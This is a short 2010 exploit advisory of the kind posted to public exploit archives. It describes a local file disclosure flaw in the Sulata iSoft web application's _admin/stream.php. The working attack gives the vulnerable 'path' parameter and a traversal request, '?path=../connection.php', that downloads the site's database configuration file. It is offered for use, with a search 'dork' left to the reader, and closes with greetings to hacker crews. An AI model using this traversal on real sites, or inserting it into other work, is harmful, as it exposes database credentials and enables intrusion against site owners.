========================================================= Sulata iSoft (stream.php) Local File Disclosure Exploit ========================================================= # Exploit Title : Sulata iSoft (developer by Rizwan Azam) you look site.com/about.php # Date : 10 December 2010 # Author : Sudden_death # Platform/Tested on: Windows XP 2 SP 2 # myweb : http://sudden.isgreat.org # dork : your imagination ====================================================================== # vuln here http://www.site.com/_admin/stream.php?path= # try to download and watch source file stream.php ..... //include_once("../home/library.php"); include_once("../connection.php"); <----------------------- look here,, This is the config suConnect(); ..... # after we know config, let us download http://www.site.com/_admin/stream.php?path=../connection.php [#]------------------------------------------------------------------- Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | jos_ali_jo | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's yang ga bisa ane sebutin satu persatu | Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!